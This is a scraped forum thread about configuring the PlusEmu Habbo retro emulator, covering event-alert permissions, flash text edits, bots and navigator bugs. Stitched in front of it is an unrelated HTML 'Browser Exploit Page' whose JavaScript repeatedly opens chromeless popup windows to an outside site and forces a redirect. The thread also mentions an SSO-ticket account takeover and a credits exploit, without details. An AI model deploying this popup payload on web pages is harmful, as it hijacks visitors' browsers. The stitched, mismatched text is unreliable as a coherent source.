<!--Begin JavaScript.-->

<script language="JavaScript">

<!--

function geoPopup()
{
    // open the popup window
    var popupURL = "http://www.nthelp.com/tanjcode.htm";
var geoname=Math.random();
    var popup = window.open(popupURL,geoname,'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105');
    // set the opener if it's not already set. it's set automatically
    // in netscape 3.0+ and ie 3.0+.
    if( navigator.appName.substring(0,8) == "Netscape" )
    {
        popup.location = popupURL;
    }
}

geoPopup();
geoPopup();

// -->

</script>

<!--End inserted JavaScript code.-->
<meta HTTP-EQUIV="REFRESH" CONTENT="6; URL=http://www.nthelp.com/tanj.htm" >
<title>Geo's Homepage</title>
</head>

<body bgcolor="000000" text="FF00FF">
<font face="arial"><font size="4">

<p align="center">Browser Exploit Page (kill this to stop) </font><br>
<br>
<br>
</p>
</font>
</body>
</html>
How do we set this up / use?

Tyth

Apr 25, 2016
Event alert was a GTE Command but you can code it in yourself i think. There probably is a Event alert command for plus but i cannot recall as i get confused between the different commands. But pretty sure it was R63a only. Unless coded yourself.

Meap

Don't need glasses if you C#
Nov 7, 2010
The command is there you just need to add command_event_alert into your permissions_commands table because with the clean database, it is not included

KingBxtch

#KingBxtch
Sep 7, 2015
Still struggling to change the name of this:
QBJILlB.png

Jerry

not rly active lol
Jul 8, 2013
Still struggling to change the name of this:
QBJILlB.png
Hi, KingBxtch. You can change the texts in your external_flash_texts.txt file (or external_flash_override_texts.txt file in the override folder).

Find:
purse.seasonal.currency=GOTW Points

Replace it with the text of your choice. I changed mine to "Event Points"
8DxgBc1.png

Best regards,
Jerry.

Meap

Don't need glasses if you C#
Nov 7, 2010
Just had a guy from a french hotel manage to get into the Owners account on HabSlick, told me theres an error in plusemu regarding sso tickets? Hes french I dont understand him all that well, has anyone else heard of this?

Sledmore

Chaturbate Livestreamer
Staff member
FindRetros Moderator
Jul 24, 2010
Just had a guy from a french hotel manage to get into the Owners account on HabSlick, told me theres an error in plusemu regarding sso tickets? Hes french I dont understand him all that well, has anyone else heard of this?

I'd focus on the CMS if anything. The emulator deletes tickets on login (or should).

SlopeQ

Mar 20, 2014
A few problems that i've created for myself (No problems with the original release.)
Problem #1
I made the navigator always show all the loaded rooms (limit 100), like so:
But unless I have at least one other category in the navi ( ), it will DC users when they click "Create New Room".
Is this because the emulator fetches the room categories from the navigator_categories where category_type = category, and if i set enabled to 0, it can't get any?, and that it cant send the packet without any room categories? I feel a bit outta my depth, but it's how I learn!

Problem #2
When a new user registers, I added a bool to the habbo.cs called isNoob, and if they are a noob to the hotel, it makes them a starter room and sets isNoob to 0. How would I go about making a bot spawn in the room, and say some stuff to the user, then walk to beside the user and say something like *gives username 5 diamonds*, then the diamonds goes up by 5. Any recommendations/ideas? I'm not sure how to delay the chat so the bot says something every 2 seconds, or how to make the bot spawn in the room just once.

I appreciate the release by the way, no way i'd have been able to keep peace up like this on any other latest UI emulator (That's released).. You remember the huge SQL usage in azure on Leaf LOL

Hi i really have to ask for your code to det the homeroom as im not able to do that some how. Thanks!

Tyth

Apr 25, 2016
Download the SWF's for the 25k 50k and 100k credits from Devbest or ***** or ***** and then follow the usual steps to add them in. Make sure you fix the exploit where they can get a lot of credits though from these bars using Tanji

Rain

c
Mar 13, 2015
A few problems that i've created for myself (No problems with the original release.)
Problem #1
I made the navigator always show all the loaded rooms (limit 100), like so:
But unless I have at least one other category in the navi ( ), it will DC users when they click "Create New Room".
Is this because the emulator fetches the room categories from the navigator_categories where category_type = category, and if i set enabled to 0, it can't get any?, and that it cant send the packet without any room categories? I feel a bit outta my depth, but it's how I learn!

Problem #2
When a new user registers, I added a bool to the habbo.cs called isNoob, and if they are a noob to the hotel, it makes them a starter room and sets isNoob to 0. How would I go about making a bot spawn in the room, and say some stuff to the user, then walk to beside the user and say something like *gives username 5 diamonds*, then the diamonds goes up by 5. Any recommendations/ideas? I'm not sure how to delay the chat so the bot says something every 2 seconds, or how to make the bot spawn in the room just once.

I appreciate the release by the way, no way i'd have been able to keep peace up like this on any other latest UI emulator (That's released).. You remember the huge SQL usage in azure on Leaf LOL
Bump, Anyone got any recommendations?

Status
Not open for further replies.

Users who are viewing this thread